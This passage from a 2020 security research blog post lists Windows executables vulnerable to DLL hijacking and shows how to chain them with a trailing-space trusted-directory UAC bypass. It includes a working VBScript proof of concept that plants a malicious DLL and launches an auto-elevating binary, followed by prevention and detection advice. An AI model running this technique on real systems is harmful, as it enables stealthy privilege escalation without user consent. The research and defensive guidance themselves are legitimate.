TTDRecord.dll
DllMain
:x:
tttracer.exe
USERENV.dll
DllMain
:x:
typeperf.exe
pdh.dll
DllMain
:x:
tzsync.exe
CRYPTBASE.dll
DllMain
:x:
tzsync.exe
CRYPTBASE.dll
SystemFunction036
:x:
uevappmonitor.exe
CRYPTBASE.dll
DllMain
:x:
uevappmonitor.exe
CRYPTBASE.dll
SystemFunction036
:x:
unlodctr.exe
loadperf.dll
DllMain
:x:
upfc.exe
XmlLite.dll
DllMain
:x:
upgraderesultsui.exe
DMCmnUtils.dll
DllMain
:x:
useraccountcontrolsettings.exe
CRYPTBASE.dll
DllMain
:x:
useraccountcontrolsettings.exe
CRYPTBASE.dll
SystemFunction036
:x:
usocoreworker.exe
Cabinet.dll
DllMain
:x:
usocoreworker.exe
DMCmnUtils.dll
DllMain
:x:
usocoreworker.exe
dmiso8601utils.dll
DllMain
:x:
usocoreworker.exe
DMOleAutUtils.dll
DllMain
:x:
usocoreworker.exe
iri.dll
DllMain
:x:
usocoreworker.exe
omadmapi.dll
DllMain
:x:
usocoreworker.exe
UpdatePolicy.dll
DllMain
:x:
usocoreworker.exe
XmlLite.dll
DllMain
:x:
utcdecoderhost.exe
USERENV.dll
DllMain
:x:
utilman.exe
OLEACC.dll
DllMain
:x:
vaultcmd.exe
VAULTCLI.dll
DllMain
:x:
vds.exe
ATL.DLL
AtlModuleInit
:x:
vds.exe
ATL.DLL
AtlModuleTerm
:x:
vds.exe
ATL.DLL
DllMain
:x:
vds.exe
bcd.dll
DllMain
:x:
vds.exe
OSUNINST.dll
DllMain
:x:
vdsldr.exe
ATL.DLL
AtlModuleInit
:x:
vdsldr.exe
ATL.DLL
AtlModuleRegisterClassObjects
:x:
vdsldr.exe
ATL.DLL
DllMain
:x:
vdsldr.exe
bcd.dll
DllMain
:x:
vssadmin.exe
ATL.DLL
DllMain
:x:
vssadmin.exe
VSSAPI.DLL
DllMain
:x:
vssadmin.exe
VssTrace.DLL
DllMain
:x:
vssadmin.exe
VssTrace.DLL
VssGetTracingContextPerThread
:x:
vssadmin.exe
VssTrace.DLL
VssIsTracingEnabled
:x:
vssadmin.exe
VssTrace.DLL
VssSetTracingContextPerThread
:x:
vssadmin.exe
VssTrace.DLL
VssTraceInitialize
:x:
vssadmin.exe
VssTrace.DLL
VssTraceUninitialize
:x:
vssvc.exe
AUTHZ.dll
DllMain
:x:
vssvc.exe
bcd.dll
DllMain
:x:
vssvc.exe
DEVOBJ.dll
DllMain
:x:
vssvc.exe
FLTLIB.DLL
DllMain
:x:
vssvc.exe
VirtDisk.dll
DllMain
:x:
vssvc.exe
VSSAPI.DLL
DllMain
:x:
vssvc.exe
VssTrace.DLL
DllMain
:x:
vssvc.exe
VssTrace.DLL
VssGetTracingContextPerThread
:x:
vssvc.exe
VssTrace.DLL
VssIsTracingEnabled
:x:
vssvc.exe
VssTrace.DLL
VssSetTracingContextPerThread
:x:
vssvc.exe
VssTrace.DLL
VssTraceInitialize
:x:
vssvc.exe
VssTrace.DLL
VssTraceUninitialize
:x:
w32tm.exe
IPHLPAPI.DLL
DllMain
:x:
w32tm.exe
logoncli.dll
DllMain
:x:
w32tm.exe
netutils.dll
DllMain
:x:
w32tm.exe
NTDSAPI.dll
DllMain
:x:
waitfor.exe
netutils.dll
DllMain
:x:
waitfor.exe
srvcli.dll
DllMain
:x:
waitfor.exe
SspiCli.dll
DllMain
:x:
wbadmin.exe
credui.dll
DllMain
:x:
wbengine.exe
bcd.dll
DllMain
:x:
wbengine.exe
CLUSAPI.dll
DllMain
:x:
wbengine.exe
DNSAPI.dll
DllMain
:x:
wbengine.exe
FLTLIB.DLL
DllMain
:x:
wbengine.exe
NETUTILS.DLL
DllMain
:x:
wbengine.exe
SPP.dll
DllMain
:x:
wbengine.exe
SRVCLI.DLL
DllMain
:x:
wbengine.exe
VirtDisk.dll
DllMain
:x:
wbengine.exe
VSSAPI.DLL
DllMain
:x:
wbengine.exe
VssTrace.DLL
DllMain
:x:
wbengine.exe
wer.dll
DllMain
:x:
wbengine.exe
XmlLite.dll
DllMain
:x:
wecutil.exe
WecApi.dll
DllMain
:x:
wecutil.exe
wevtapi.dll
DllMain
:x:
werfault.exe
dbgcore.DLL
DllMain
:x:
werfault.exe
faultrep.dll
DllMain
:x:
werfault.exe
wer.dll
DllMain
:x:
werfault.exe
wer.dll
WerpSetExitListeners
:x:
werfaultsecure.exe
dbgcore.DLL
DllMain
:x:
werfaultsecure.exe
faultrep.dll
DllMain
:x:
werfaultsecure.exe
wer.dll
DllMain
:x:
werfaultsecure.exe
wer.dll
WerpSetExitListeners
:x:
wermgr.exe
wer.dll
DllMain
:x:
wermgr.exe
wer.dll
WerpSetExitListeners
:x:
wextract.exe
Cabinet.dll
DllMain
:x:
wfs.exe
ATL.DLL
DllMain
:x:
wfs.exe
credui.dll
DllMain
:x:
wfs.exe
IPHLPAPI.DLL
DllMain
:x:
wfs.exe
PROPSYS.dll
DllMain
:x:
wfs.exe
UxTheme.dll
DllMain
:x:
whoami.exe
AUTHZ.dll
DllMain
:x:
whoami.exe
netutils.dll
DllMain
:x:
whoami.exe
SspiCli.dll
DllMain
:x:
whoami.exe
wkscli.dll
DllMain
:x:
wiaacmgr.exe
ScanSetting.DLL
DllMain
:x:
wiaacmgr.exe
UxTheme.dll
DllMain
:x:
wiawow64.exe
ScanSetting.DLL
DllMain
:x:
wiawow64.exe
UxTheme.dll
DllMain
:x:
wifitask.exe
HTTPAPI.dll
DllMain
:x:
wifitask.exe
IPHLPAPI.DLL
DllMain
:x:
wifitask.exe
webservices.dll
DllMain
:x:
wifitask.exe
wlanapi.dll
DllMain
:x:
wimserv.exe
Cabinet.dll
DllMain
:x:
winlogon.exe
UXINIT.dll
DllMain
:x:
winlogon.exe
UXINIT.dll
ThemesOnTerminateSession
:x:
winrs.exe
DSROLE.dll
DllMain
:x:
winrs.exe
mi.dll
DllMain
:x:
winrs.exe
miutils.dll
DllMain
:x:
wkspbroker.exe
credui.dll
DllMain
:x:
wkspbroker.exe
DNSAPI.dll
DllMain
:x:
wkspbroker.exe
ktmw32.dll
DllMain
:x:
wkspbroker.exe
PROPSYS.dll
DllMain
:x:
wkspbroker.exe
RADCUI.dll
DllMain
:x:
wkspbroker.exe
SspiCli.dll
DllMain
:x:
wkspbroker.exe
tsworkspace.dll
DllMain
:x:
wkspbroker.exe
WINHTTP.dll
DllMain
:x:
wkspbroker.exe
WININET.dll
DllMain
:x:
wksprt.exe
webservices.dll
DllMain
:x:
wksprt.exe
WININET.dll
DllMain
:x:
wlrmdr.exe
SspiCli.dll
DllMain
:x:
wmpdmc.exe
dwmapi.dll
DllMain
:x:
wmpdmc.exe
OLEACC.dll
DllMain
:x:
wmpdmc.exe
UxTheme.dll
DllMain
:x:
wmpdmc.exe
WindowsCodecs.dll
DllMain
:x:
wmpdmc.exe
wmpdui.dll
DllMain
:x:
workfolders.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
workfolders.exe
CLDAPI.dll
DllMain
:x:
workfolders.exe
CRYPTBASE.DLL
DllMain
:x:
workfolders.exe
DEVOBJ.dll
DllMain
:x:
workfolders.exe
dmEnrollEngine.DLL
DllMain
:x:
workfolders.exe
edputil.dll
DllMain
:x:
workfolders.exe
edputil.dll
EdpGetIsManaged
:x:
workfolders.exe
FLTLIB.DLL
DllMain
:x:
workfolders.exe
policymanager.dll
DllMain
:x:
workfolders.exe
PROPSYS.dll
DllMain
:x:
workfolders.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
workfolders.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
workfolders.exe
USERENV.dll
DllMain
:x:
workfolders.exe
USERENV.dll
GetProfileType
:x:
wowreg32.exe
devrtl.DLL
DllMain
:x:
wpcmon.exe
samcli.dll
DllMain
:x:
wpcmon.exe
USERENV.dll
DllMain
:x:
wpnpinst.exe
Cabinet.dll
DllMain
:x:
wpnpinst.exe
IPHLPAPI.DLL
DllMain
:x:
wpnpinst.exe
PROPSYS.dll
DllMain
:x:
wpr.exe
WindowsPerformanceRecorderControl.dll
DllMain
:x:
write.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
write.exe
CLDAPI.dll
DllMain
:x:
write.exe
CRYPTBASE.DLL
DllMain
:x:
write.exe
edputil.dll
DllMain
:x:
write.exe
edputil.dll
EdpGetIsManaged
:x:
write.exe
FLTLIB.DLL
DllMain
:x:
write.exe
PROPSYS.dll
DllMain
:x:
write.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
write.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
wscadminui.exe
CRYPTBASE.DLL
DllMain
:x:
wsmanhttpconfig.exe
DSROLE.dll
DllMain
:x:
wsmanhttpconfig.exe
HTTPAPI.dll
DllMain
:x:
wsmanhttpconfig.exe
HTTPAPI.dll
HttpInitialize
:x:
wsmanhttpconfig.exe
HTTPAPI.dll
HttpTerminate
:x:
wsmanhttpconfig.exe
mi.dll
DllMain
:x:
wsmanhttpconfig.exe
miutils.dll
DllMain
:x:
wsmprovhost.exe
DSROLE.dll
DllMain
:x:
wsmprovhost.exe
mi.dll
DllMain
:x:
wsmprovhost.exe
miutils.dll
DllMain
Some caveats:
- The test was performed by simply running each executable, without specifying any parameters and with no further user interaction. This explains why the well-documented
xwizard.exe
DLL hijack [ 15 ] is not present in this list, because it requires two (arbitrary) arguments for it to work.
- Some applications come with a GUI, or some other visual element that gives away the binary was executed. This also includes error messages: required DLLs might be missing, and the hijacked DLL obviously lacks the original functionality. Attackers are less likely to target such applications for DLL hijacking purposes.
- DLLs of which the original version was written in C++ have not been taken into account.
A CVS version of the full list can be found on GitHub [ 14 ].
Combining with UAC bypass
Having found all these executables, at most this allows us to execute code through trusted programs. However, it is also possible to gain elevated rights if used in conjunction with UAC Bypass techniques.
User Account Control (UAC) [ 16 ] was introduced in Windows Vista as a security feature, asking users for confirmation through a prompt before a process running under normal privileges is elevated to higher privileges. After users complained about getting flooded with UAC prompts when doing arbitrary tasks, Microsoft introduced auto elevation in Windows 7, which automatically elevates certain processes if they are located in trusted directories (such as c:\windows\system32
).
With this in mind, you could try running arbitrary code with elevated privileges by using an executable that is marked for auto elevation that is also vulnerable to DLL hijacking. There are about 35 of such executables, as can be seen in the previous section. The problem to overcome is that of the trusted directory: both the auto-elevate executable and the custom DLL need to be located in a trusted directory, but none of theses are user writeable.
There is some excellent research about bypassing UAC out there - one of my favourite techniques is the mocking of trusted directories using trailing spaces [ 17 ]. I would recommend reading the full blog post, but it boils down to users being able to create c:\windows \system32\
(note the space after the first folder), and auto-elevate executables placed in this folder consider this a trusted location.
It is debatable whether this is a proper security vulnerability - Microsoft argue it is not [ 18 ], but it is at least a flaw, given that most (non-enterprise) Windows computers are using ‘administrator accounts’ by default.
Either way, this provides us with an excellent means through which DLL hijacking can be made much more powerful. Note that folders with trailing spaces cannot be created through traditional means on Windows. You could compile some lines of C to do this, as is done by the original researcher, but it turns out VBScript can actually do this for us too. The following proof-of-concept shows that with only a few lines of code you can get this to work:
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = wscript.createobject("WScript.Shell")
' Get target binary and payload
WScript.StdOut.Write("System32 binary: ")
strBinary = WScript.StdIn.ReadLine()
WScript.StdOut.Write("Path to your DLL: ")
strDLL = WScript.StdIn.ReadLine()
' Create folders
Const target = "c:\windows \"
target_sys32 = (target & "system32\")
target_binary = (target_sys32 & strBinary)
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End If
If Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If
' Copy legit binary and evil DLL
oFSO.CopyFile ("c:\windows\system32\" & strBinary), target_binary
oFSO.CopyFile strDLL, target_sys32
' Run, Forrest, Run!
wshshell.Run("""" & target_binary & """")
' Clean files
WScript.StdOut.Write("Clean up? (press enter to continue)")
WScript.StdIn.ReadLine()
wshshell.Run("powershell /c ""rm -r """"\\?\" & target & """""""") 'Deletion using VBScript is problematic, use PowerShell instead
The screenshot below shows what execution of the script might look like.
An example showing an elevated prompt after a malicious dxgi.dll was loaded by a legitimate winsat.exe from a mocked trusted directory, without getting any UAC prompts.
In the table above, all executable/DLL combinations for which the auto elevation was successful are marked in the first column. With over 160 possible combinations, there are quite some options.
Prevention and detection
A simple way to prevent DLL hijacking from happening would be for applications to always use absolute paths instead of relative ones. Although some applications (notably portable ones) will not always be able to do so, applications located in \system32\
and relying on DLLs in the same folder have no excuse for doing otherwise. The better option, which only very few Windows executables seem to do, is to verify all DLLs before loading them (e.g. by checking their signatures) - this would largely eliminate the problem.
Nevertheless, as we have seen, attackers will still be able to bring older versions of legitimate/trusted applications that can be exploited. So even if every application starts checking their DLLs before loading them from now on, we would still have to deal with this problem.
Let’s therefore focus on detection. You could hunt for the creation or loading of any of the DLLs mentioned before from unexpected paths, particularly in temp locations such as %appdata%
. After all, the name of the (legitimate) application loading the DLLs can be changed, but the filenames of DLLs are always fixed. A sample Sigma rule for this can be found here [ 19 ] - it successfully detects our DLL hijacking, although as you can see, it doesn’t scale very well and is likely to be prone to false positives. You could take a more generic approach by looking for the presence of Microsoft-signed binaries in unexpected locations, of the loading of DLLs from unexpected locations by such Microsoft-signed binaries (regardless of location).
Finally, the demonstrated UAC bypass technique can be detected easily and reliably by looking for any activity in the /windows /
folder, or in any folders ending in a space for that matter. As described before, Windows folders with trailing spaces cannot be created through normal means and should therefore be rare, and always suspicious. Setting your UAC mode to ‘Always notify’, one level higher than the default, will prevent this and other similar UAC bypass techniques from succeeding.
Posted on 2020-06-22